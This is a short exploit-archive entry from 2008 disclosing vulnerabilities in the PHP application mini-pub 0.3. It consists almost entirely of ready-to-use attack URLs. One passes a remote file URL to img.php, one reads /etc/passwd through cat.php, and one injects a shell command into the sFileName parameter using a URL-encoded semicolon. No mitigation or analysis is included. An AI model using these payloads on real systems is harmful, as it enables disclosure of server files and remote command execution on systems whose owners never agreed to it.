[Exploit]  [Remote]  [Local]  [Web Apps]  [Dos/Poc]  [Shellcode]  [RSS]

# Title : mini-pub 0.3 (LFD/CE) Multiple Remote Vulnerabilities
# Published : 2008-10-12
# Author : muuratsalo
# Previous Title : IndexScript 3.0 (sug_cat.php parent_id) SQL Injection Vulnerability
# Next Title : mini-pub 0.3 Local Directory Traversal / File Disclosure Vulnerabilities


mini-pub 0.3 multiple vulnerabilities

download   http://sourceforge.net/projects/mini-pub/

author     muuratsalo
contact    muuratsalo[at]gmail.com

exploits
1. local file disclosure
http://localhost/mini-pub.php/front-end/img.php?sFileName=http://site.com/cmd.txt?

2. local file disclosure
http://localhost/mini-pub.php/front-end/cat.php?sFileName=/etc/passwd

3. command execution
http://localhost/mini-pub.php/front-end/cat.php?sFileName=a%3Benv

# www.Syue.com [2008-10-12]